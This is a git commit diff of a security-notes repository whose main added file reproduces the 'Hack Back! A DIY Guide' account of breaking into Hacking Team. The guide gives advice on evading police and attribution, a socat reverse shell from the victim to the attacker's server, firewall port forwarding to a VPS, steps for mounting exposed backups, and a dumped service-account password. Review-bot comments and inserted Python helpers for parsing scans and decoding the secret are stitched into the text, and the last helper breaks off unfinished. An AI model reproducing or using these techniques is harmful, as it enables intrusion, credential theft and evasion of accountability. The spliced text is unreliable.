Draft/Draft/Cheat sheets reference pages Checklists -/Linux/QuickRef-Enum.txt → Draft/Cheat sheets reference pages Checklists -/Linux/QuickRef-Enum.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt → Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/cheat sheet Basic Linux Privilege Escalation.txt → Draft/Cheat sheets reference pages Checklists -/Linux/cheat sheet Basic Linux Privilege Escalation.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt → Draft/Cheat sheets reference pages Checklists -/Metasploit.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt → Draft/Cheat sheets reference pages Checklists -/Ncat.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt → Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt → Draft/Cheat sheets reference pages Checklists -/Nmap.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Radare2.txt → Draft/Cheat sheets reference pages Checklists -/Radare2.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt → Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt → Draft/Cheat sheets reference pages Checklists -/TCPDump.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt → Draft/Cheat sheets reference pages Checklists -/ToDO.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt → Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Windows/Post Exploitation on Windows.txt → Draft/Cheat sheets reference pages Checklists -/Windows/Post Exploitation on Windows.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt → Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf → Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf View File

Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt → Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt View File

Draft/Draft/Conference Video Archives Stuff → Draft/Conference Video Archives Stuff View File

Draft/Draft/Counter → Draft/Counter View File

Draft/Draft/Courses & Training → Draft/Courses & Training View File

Draft/Draft/ → Draft/ View File

Draft/Draft/Cryptography & → Draft/Cryptography & View File

Draft/Draft/Cryptography & Encryption/Linux → Draft/Cryptography & Encryption/Linux Systems.txt View File

Draft/Draft/Cryptography & Encryption/Vids Papers → Draft/Cryptography & Encryption/Vids Papers Blogposts.txt View File

Draft/Draft/Cryptography & Encryption/ → Draft/Cryptography & Encryption/cull.txt View File

Draft/Draft/Darknets → Draft/Darknets View File

Draft/Draft/Data → Draft/Data View File

Draft/Draft/Disclosure → Draft/Disclosure View File

Draft/Draft/Disinformation → Draft/Disinformation View File

Draft/Draft/Documentation & Reports → Draft/Documentation & Reports View File

+ 0
- 10
Draft/Draft/Car View File

@ -1,10 +0,0 @@
#Car Hacking
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](
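Review bot: this deletion of Draft/Draft/Car repeats the "#Car Hacking" heading and the Troopers15 link that the new Draft/Car hunk re-adds, so git has recorded a delete plus create instead of the rename it detected for the neighbouring files (e.g. "Draft/Draft/Counter → Draft/Counter"). The hunk header says 10 lines were removed but only two are shown; check that the other eight were carried over to Draft/Car before merging, or do the rename and the content edit as two commits so the history stays readable.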

Draft/Draft/DRAFT Cyber Security Task Force Insurance Data Security Model Law.pdf View File

+ 0
- 0
Draft/Draft/Draft.rtf View File

Draft/Draft/NIST Cyber Security Framework for Improving Critical Infrastructure 02122014.pdf View File

Draft/Draft/PCI_DSS_v3-1.pdf View File

+ 0
- 0
Draft/Draft/Securing Hardening_1/Securing Linux/Securing Linux.rtf View File

+ 0
- 0
Draft/Draft/Securing Hardening_1/Securing OS X/Securing OS X.rtf View File

+ 0
- 9
Draft/Draft/Securing Hardening_1/Securing Windows/Cull.txt View File

@ -1,9 +0,0 @@
[Mitigating Pass-the-Hash Attacks and other credential Theft-version2](
* Official MS paper.
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](
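Review bot: removing Draft/Draft/Securing Hardening_1/Securing Windows/Cull.txt drops the "Mitigating Pass-the-Hash Attacks and other credential Theft-version2" and SEHOP references, and the sibling Securing Windows.rtf shows +0 -0 in this commit, so neither reference is moved anywhere visible on this page. If the cull was meant to be folded into the hardening notes, add the two links there first and delete the cull file in the same commit; as it stands the only Windows hardening references in this tree are being lost.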

+ 0
- 0
Draft/Draft/Securing Hardening_1/Securing Windows/Securing Windows.rtf View File

+ 0
- 0
Draft/Draft/To Do/To Do.rtf View File

+ 0
- 289
Draft/Draft/To Do/add cull -3.txt View File

@ -1,289 +0,0 @@
Shellsploit let's you generate customized shellcodes, backdoors, injectors for various operating system. And let's you obfuscation every byte via encoders
Urge Everyone to watch:
Hamming - You and your research
Computer SCience from the Bottom Up |
Blogpost explaining above
Linux kernel development
| **Security
| **ClearImage Free Online Barcode Reader / Decoder** |
Good source for internals section:
Defeating Sniffers and Intrustion Detection Systems - Horizon, 12/25/1998
Armouring the ELF: Binary Encryption on the UNIX Platform - grugq, scut, 12/28/2001
Runtime Process Infection - anonymous, 07/28/2002
Polymorphic Shellcode Engine Using Spectrum Analysis - theo detristan et al, 08/13/2003
Next-generation Runtime Binary Encryption using On-demand Function Extraction - Zeljko Vrba, 08/01/2005
Stealth Hooking: Another Way to Subvert the Windows Kernel - mxatone, ivanlef0u, 04/11/2008
Mystifying the Debugger for Ultimate Stealthness - halfdead, 04/11/2008
Binary Mangling with Radare - pancake, 06/11/2009
[pwndbg - Making debugging suck less](
* A PEDA replacement. In the spirit of our good friend windbg, pwndbg is pronounced pwnd-bag.
* Uses capstone as backend.
IPv6: Basic Attacks and Defences - Christopher Werny[TROOPERS15]
* [Part 1](
* [Part 2](
Decode Shellcode from cli: cat shellcode | rasm2 -d -
General Section?
[The foundation is rotting and the basement is flooding: A deeper look at the implicit trust relationships in your organization](
MS Assessment Deployment Toolkit - Measure boot times among other things
[List of hacker sites](
Cull the interesting papers
Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications.
Check under research section
Go through
Compare resources against what power-view can grab
Compare against sysmon service for scaling, setting it as service with scripting
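Review bot: this removes 289 lines of the to-do cull, and none of the items visible here (the paper list from "Defeating Sniffers and Intrustion Detection Systems" through "Binary Mangling with Radare", the pwndbg entry, the TROOPERS15 IPv6 talk, the Dare retargeting tool, and the one-liner "Decode Shellcode from cli: cat shellcode | rasm2 -d -") reappears in any added hunk on this page. The commit message "Cleanup; More to do" does not say where they were filed; either name the destination files in the message or keep the list until they have been moved. The hunk header counts 289 removed lines but only a fraction are shown, so the rest cannot be checked from this view.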

Draft/Draft/Embedded Device & Hardware Hacking → Draft/Embedded Device & Hardware Hacking View File

Draft/Draft/ → Draft/ View File

Draft/Draft/Exploit → Draft/Exploit View File

Draft/Draft/Exploit Development/Lab for Practicing Exploit → Draft/Exploit Development/Lab for Practicing Exploit Writing.txt View File

Draft/Draft/Forensics Incident → Draft/Forensics Incident View File

Draft/Draft/Frameworks → Draft/Frameworks View File

Draft/Draft/Frameworks Methodologies/Metasploit → Draft/Frameworks Methodologies/Metasploit Reference.txt View File

Draft/Draft/Frameworks Methodologies/Meterpreter Scripts and → Draft/Frameworks Methodologies/Meterpreter Scripts and Description.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt View File

Draft/Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt → Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt View File

Draft/Draft/Frameworks Methodologies/Post Exploitation with → Draft/Frameworks Methodologies/Post Exploitation with Metasploit.txt View File

Draft/Draft/Fuzzing Bug → Draft/Fuzzing Bug View File

+ 14
- 0
Draft/Game View File

@ -0,0 +1,14 @@
##Game Hacking
Pince -
PINCE is a gdb front-end/reverse engineering tool focused on games, but it can be used for any reverse-engineering related stuff. PINCE is an abbreviation for "PINCE is not Cheat Engine". PINCE's GUI is heavily "inspired(;D)" by Cheat Engine.
[The Multibillion Dollar Industry That's Ignored](
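Review bot: "Pince -" has no link target, so the PINCE entry points nowhere, and the final link ends at "](" without a URL. The heading uses "##Game Hacking" (H2, no space) while Draft/Car added in the same commit uses "#Car Hacking"; pick one level and put a space after the hashes so both render. The hunk header counts 14 added lines and four are shown; confirm the missing lines are not the URLs.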

Draft/Draft/Google → Draft/Google View File

+ 926
- 0
Draft/Hacking Team View File

@ -0,0 +1,926 @@
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
_,-\ o O_/;
/ , ` `|
| \-.,___, / `
\ `-.__/ / ,.\
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || __ _ _ _____ __
.-"-._,(__) .(__).-""-. | | | | |_ _| |
/ \ / \ | | |_| | | | |
\ / \ / | | _ | | | |
`'-------` `--------'` __| |_| |_| |_| |__
--[ 1 - Introduction ]----------------------------------------------------------
You'll notice the change in language since the last edition [1]. The
English-speaking world already has tons of books, talks, guides, and
info about hacking. In that world, there's plenty of hackers better than me,
but they misuse their talents working for "defense" contractors, for intelligence
agencies, to protect banks and corporations, and to defend the status quo.
Hacker culture was born in the US as a counterculture, but that origin only
remains in its aesthetics - the rest has been assimilated. At least they can
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
rebels while they work for the Man.
You used to have to sneak into offices to leak documents [2]. You used to need
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
--[ 2 - Hacking Team ]----------------------------------------------------------
Hacking Team was a company that helped governments hack and spy on
journalists, activists, political opposition, and other threats to their power
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
RCS". They also claimed to have technology to solve the "problem" posed by Tor
and the darknet [13]. But seeing as I'm still free, I have my doubts about
its effectiveness.
--[ 3 - Stay safe out there ]---------------------------------------------------
Unfortunately, our world is backwards. You get rich by doing bad things and go
to jail for doing good. Fortunately, thanks to the hard work of people like
the Tor project [1], you can avoid going to jail by taking a few simple
1) Encrypt your hard disk [2]
I guess when the police arrive to seize your computer, it means you've
already made a lot of mistakes, but it's better to be safe.
2) Use a virtual machine with all traffic routed through Tor
This accomplishes two things. First, all your traffic is anonymized through
Tor. Second, keeping your personal life and your hacking on separate
computers helps you not to mix them by accident.
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
something custom [6]. Here's [7] a detailed comparison.
3) (Optional) Don't connect directly to Tor
Tor isn't a panacea. They can correlate the times you're connected to Tor
with the times your hacker handle is active. Also, there have been
successful attacks against Tor [8]. You can connect to Tor using other
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
before Tor, but that's less secure because they can still correlate the
hacker's activity with your house's internet activity (this was used as
evidence against Jeremy Hammond [11]).
The reality is that while Tor isn't perfect, it works quite well. When I
was young and reckless, I did plenty of stuff without any protection (I'm
referring to hacking) apart from Tor, that the police tried their hardest
to investigate, and I've never had any problems.
----[ 3.1 - Infrastructure ]----------------------------------------------------
I don't hack directly from Tor exit nodes. They're on blacklists, they're
slow, and they can't receive connect-backs. Tor protects my anonymity while I
connect to the infrastructure I use to hack, which consists of:
1) Domain Names
For C&C addresses, and for DNS tunnels for guaranteed egress.
2) Stable Servers
For use as C&C servers, to receive connect-back shells, to launch attacks,
and to store the loot.
3) Hacked Servers
For use as pivots to hide the IP addresses of the stable servers. And for
when I want a fast connection without pivoting, for example to scan ports,
scan the whole internet, download a database with sqli, etc.
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
used carefully).
----[ 3.2 - Attribution ]-------------------------------------------------------
In the news we often see attacks traced back to government-backed hacking
groups ("APTs"), because they repeatedly use the same tools, leave the same
footprints, and even use the same infrastructure (domains, emails, etc).
They're negligent because they can hack without legal consequences.
I didn't want to make the police's work any easier by relating my hack of
Hacking Team with other hacks I've done or with names I use in my day-to-day
work as a blackhat hacker. So, I used new servers and domain names, registered
with new emails, and payed for with new bitcoin addresses. Also, I only used
tools that are publicly available, or things that I wrote specifically for
this attack, and I changed my way of doing some things to not leave my usual
forensic footprint.
--[ 4 - Information Gathering ]-------------------------------------------------
Although it can be tedious, this stage is very important, since the larger the
attack surface, the easier it is to find a hole somewhere in it.
----[ 4.1 - Technical Information ]---------------------------------------------
Some tools and techniques are:
1) Google
A lot of interesting things can be found with a few well-chosen search
queries. For example, the identity of DPR [1]. The bible of Google hacking
is the book "Google Hacking for Penetration Testers". You can find a short
summary in Spanish at [2].
2) Subdomain Enumeration
Often, a company's main website is hosted by a third party, and you'll find
the company's actual IP range thanks to subdomains like or Also, sometimes there are things that shouldn't be exposed
in "hidden" subdomains. Useful tools for discovering domains and subdomains
are fierce [3], theHarvester [4], and recon-ng [5].
3) Whois lookups and reverse lookups
With a reverse lookup using the whois information from a domain or IP range
of a company, you can find other domains and IP ranges. As far as I know,
there's no free way to do reverse lookups aside from a google "hack":
"via della moscova 13"
"via della moscova 13"
4) Port scanning and fingerprinting
Unlike the other techniques, this talks to the company's servers. I
include it in this section because it's not an attack, it's just
information gathering. The company's IDS might generate an alert, but you
don't have to worry since the whole internet is being scanned constantly.
For scanning, nmap [6] is precise, and can fingerprint the majority of
services discovered. For companies with very large IP ranges, zmap [7] or
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
----[ 4.2 - Social Information ]------------------------------------------------
For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:
1) Google
Here as well, it's the most useful tool.
2) theHarvester and recon-ng
I already mentioned them in the previous section, but they have a lot more
functionality. They can find a lot of information quickly and
automatically. It's worth reading all their documentation.
3) LinkedIn
A lot of information about the employees can be found here. The company's
recruiters are the most likely to accept your connection requests.
Previously known as jigsaw. They have contact information for many
5) File Metadata
A lot of information about employees and their systems can be found in
metadata of files the company has published. Useful tools for finding
files on the company's website and extracting the metadata are metagoofil
[1] and FOCA [2].
--[ 5 - Entering the network ]--------------------------------------------------
There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.
----[ 5.1 - Social Engineering ]------------------------------------------------
Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.
----[ 5.2 - Buying Access ]-----------------------------------------------------
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.
----[ 5.3 - Technical Exploitation ]--------------------------------------------
After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum: -
descr: HT public subnet
Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].
--[ 6 - Be Prepared ]-----------------------------------------------------------
I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.
The post-exploitation tools that I'd prepared were:
1) busybox
   For all the standard Unix utilities that the system didn't have.
2) nmap
   To scan and fingerprint Hacking Team's internal network.
3) Responder.py
   The most useful tool for attacking windows networks when you have access to
   the internal network, but no domain user.
4) Python
   To execute Responder.py
5) tcpdump
   For sniffing traffic.
6) dsniff
   For sniffing passwords from plaintext protocols like ftp, and for
   arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
   and NaGA, but it was hard to compile it for the system.
7) socat
   For a comfortable shell with a pty:
   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
                     tcp:my_server:my_port
   And useful for a lot more, it's a networking swiss army knife. See the
   examples section of its documentation.
8) screen
   Like the shell with pty, it wasn't really necessary, but I wanted to feel
   at home in Hacking Team's network.
9) a SOCKS proxy server
   To use with proxychains to be able to access their local network from any
10) tgcd
   For forwarding ports, like for the SOCKS server, through the firewall.
The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.
--[ 7 - Watch and Listen ]------------------------------------------------------
Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.
--[ 8 - NoSQL Databases ]-------------------------------------------------------
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
|_ version = 2.6.5
They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.
--[ 9 - Crossed Cables ]--------------------------------------------------------
Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork
Nmap scan report for ht-synology.hackingteam.local (
3260/tcp open iscsi?
| iscsi-info:
| Target:
| Address:,0
|_ Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (
3260/tcp open iscsi?
| iscsi-info:
| Target:
| Address:,0
| Address:,0
|_ Authentication: No authentication required
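The two scan excerpts above (MongoDB answering listDatabases with no credentials, and iSCSI targets reporting "No authentication required") are the kind of thing worth pulling out of a slow nmap run automatically. The following is an added example, not code from the guide: it parses nmap's -sV/-sC text output and flags ports whose NSE script output proves the service answered without authentication. The sample scan text is constructed for the example; the host names other than ht-synology are invented and the (elided) addresses are placeholders.

```python
import re

# Constructed sample in nmap's -sV/-sC text format, modelled on the MongoDB and
# iSCSI results quoted in the text; HOST_A/B/C stand in for the elided addresses.
SAMPLE_NMAP = """\
Nmap scan report for rcs-test.example.local (HOST_A)
27017/tcp open  mongodb MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
|_  version = 2.6.5
Nmap scan report for ht-synology.hackingteam.local (HOST_B)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target:
|     Address: HOST_B:3260,0
|_    Authentication: No authentication required
Nmap scan report for nas.example.local (HOST_C)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target:
|     Address: HOST_C:3260,0
|_    Authentication: CHAP required
"""

# NSE script name -> (output line that proves no auth was needed, what it means)
NO_AUTH_RULES = {
    "mongodb-databases": ("ok = 1",
                          "listDatabases answered without credentials"),
    "iscsi-info": ("Authentication: No authentication required",
                   "target exports its LUNs without CHAP"),
}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
SCRIPT_RE = re.compile(r"^\|_? ([A-Za-z0-9-]+):$")   # "| name:" with exactly one space


def parse_nmap(text):
    """Return {host: {port: {"service": str, "scripts": {name: [lines]}}}}."""
    hosts, host, port, script = {}, None, None, None
    for raw in text.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host, port, script = m.group(1), None, None
            hosts[host] = {}
            continue
        m = PORT_RE.match(raw)
        if m and host:
            port, script = f"{m.group(1)}/{m.group(2)}", None
            hosts[host][port] = {"service": m.group(3), "scripts": {}}
            continue
        if raw.startswith("|") and port:
            m = SCRIPT_RE.match(raw)
            if m:                                   # start of an NSE script block
                script = m.group(1)
                hosts[host][port]["scripts"][script] = []
            elif script:                            # nested output line of that script
                hosts[host][port]["scripts"][script].append(raw.lstrip("|_").strip())
    return hosts


def find_unauthenticated(hosts):
    """List every port whose script output shows the service answered with no auth."""
    findings = []
    for host, ports in hosts.items():
        for port, info in ports.items():
            for script, lines in info["scripts"].items():
                rule = NO_AUTH_RULES.get(script)
                if rule and any(rule[0] in line for line in lines):
                    findings.append({"host": host, "port": port,
                                     "service": info["service"], "why": rule[1]})
    return findings


if __name__ == "__main__":
    for f in find_unauthenticated(parse_nmap(SAMPLE_NMAP)):
        print(f"{f['host']} {f['port']} {f['service']}: {f['why']}")
```

The mongodb-databases rule keys on "ok = 1" because that is what listDatabases returns when it succeeds; a server with auth enabled answers the same command with ok = 0 and an errmsg, so it is not flagged. The third host (CHAP required) is the negative case.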
iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:
VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p
Now iSCSI finds the name but has problems mounting it
because it thinks its IP is instead of
The way I solved it was:
iptables -t nat -A OUTPUT -d -j DNAT --to-destination
And now, after:
iscsiadm -m node -p --login
...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big to download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1
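The one arithmetic step in the chain above, turning the partition's start sector into a byte offset for losetup -o, is also the one people get wrong when the image does not use 512-byte sectors. The following is an added example, not code from the guide: it reads the unit size and partition table out of fdisk -l output and computes the offset for every partition, so it generalises past the single 2048 * 512 case in the text. The fdisk output is constructed for the example (the first disk mirrors the line quoted above, the second has 4096-byte logical sectors); the file and loop device names are placeholders.

```python
import re

# Constructed fdisk -l output: disk one is modelled on the line quoted in the
# text (512-byte sectors); disk two uses 4096-byte logical sectors to show why
# the unit size must be read from the output rather than assumed.
FDISK_OUTPUT = """\
Disk /dev/loop0: 600 GiB, 644245094400 bytes, 1258291200 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes

Device       Boot      Start        End    Sectors  Size Id Type
/dev/loop0p1           2048 1258287103 1258285056  600G  7 HPFS/NTFS/exFAT

Disk /dev/loop2: 1 GiB, 1073741824 bytes, 262144 sectors
Units: sectors of 1 * 4096 = 4096 bytes
Sector size (logical/physical): 4096 bytes / 4096 bytes

Device       Boot Start    End Sectors  Size Id Type
/dev/loop2p1 *     2048 262143  260096 1016M 83 Linux
"""

# Old fdisk prints "Units = sectors of ...", new fdisk "Units: sectors of ..."
UNITS_RE = re.compile(r"^Units[:=]\s*sectors of \d+ \* \d+ = (\d+) bytes")
# device, optional boot flag, start sector, end sector, sectors/blocks column
PART_RE = re.compile(r"^(/dev/\S+)\s+(?:\*\s+)?(\d+)\s+(\d+)\s+(\d+)")


def partition_offsets(text):
    """Map each partition device in fdisk -l output to its byte offset."""
    offsets, unit = {}, None
    for line in text.splitlines():
        m = UNITS_RE.match(line)
        if m:
            unit = int(m.group(1))          # applies to the partitions that follow
            continue
        m = PART_RE.match(line)
        if m and unit:
            dev, start = m.group(1), int(m.group(2))
            offsets[dev] = start * unit
    return offsets


def losetup_command(backing_file, partition, offsets, loop="/dev/loop1"):
    """The read-only losetup invocation that exposes one partition of an image."""
    return f"losetup -r -o {offsets[partition]} {loop} {backing_file}"


if __name__ == "__main__":
    offs = partition_offsets(FDISK_OUTPUT)
    for dev, off in offs.items():
        print(f"{dev}: offset {off}")
    print(losetup_command("exchange.vmdk", "/dev/loop0p1", offs))
```

On a current util-linux the second loop device is unnecessary: losetup -P (--partscan) on the image makes the kernel expose the partitions as /dev/loopNpM directly. The offset calculation is still the thing to understand for the cases where that is not available (old distributions, nested images, or a partition table the kernel refuses to parse).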
--[ 10 - From backups to domain admin ]-----------------------------------------
What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
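The dump above is readable by eye, but it is worth seeing the layout it shows: the first DWORD (16 00 00 00 = 22) is the byte length of the secret and the UTF-16LE string starts at offset 0x10. The following is an added example, not code from the guide or from the lsadump tool: it rebuilds the raw buffer from the hexdump text and decodes the _SC_ service password from that layout, with a fallback scanner for secrets whose layout is not known. The only input is the dump quoted above.

```python
import re
import struct

# The lsadump hexdump of the _SC_ secret as quoted in the text:
# offset, 16 hex bytes, ASCII column.
SC_DUMP = """\
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
"""


def hexdump_to_bytes(dump, width=16):
    """Rebuild the raw buffer from a hexdump with `width` bytes per full row.

    Rows are taken by field position (offset, then `width` hex bytes), so the
    ASCII column cannot be mistaken for data even when it looks hex-like.
    """
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if len(fields) < 1 + width:
            continue
        offset = int(fields[0], 16)
        if offset != len(out):
            raise ValueError(f"non-contiguous dump at offset {offset:#x}")
        out += bytes.fromhex("".join(fields[1:1 + width]))
    return bytes(out)


def decode_sc_secret(blob):
    """Decode a decrypted _SC_ secret: DWORD length at +0, UTF-16LE data at +0x10."""
    (length,) = struct.unpack_from("<I", blob, 0)
    data = blob[0x10:0x10 + length]
    if len(data) != length or length % 2:
        raise ValueError("truncated or non-UTF-16 secret")
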